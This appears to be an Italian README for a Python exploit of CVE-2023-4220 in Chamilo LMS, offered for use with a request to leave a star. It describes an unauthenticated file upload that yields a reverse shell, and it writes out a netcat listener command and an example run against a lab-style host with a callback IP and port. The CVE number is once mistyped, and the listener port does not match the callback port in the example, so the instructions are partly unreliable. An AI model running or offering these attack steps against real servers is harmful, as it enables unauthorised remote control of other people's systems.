
Exploit Python per CVE-2023-4220 in Chamilo LMS che carica un file e fornisce una reverse shell non autenticata a un listener netcat.
pip install requests
Lo script Python sfrutta la vulnerabilità CVE-2023-422 per caricare un file nel server e utilizza quel file per inviare una reverse shell al listener netcat, e tutto questo può essere fatto senza essere autenticati. Tuttavia, sarà necessario seguire i seguenti passaggi per utilizzare con successo lo script Python.
Avviare il listener netcat:
nc -lnvp 4444
Esecuzione dello script Python (Esempio):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Lascia una stella se il seguente exploit è stato utile :)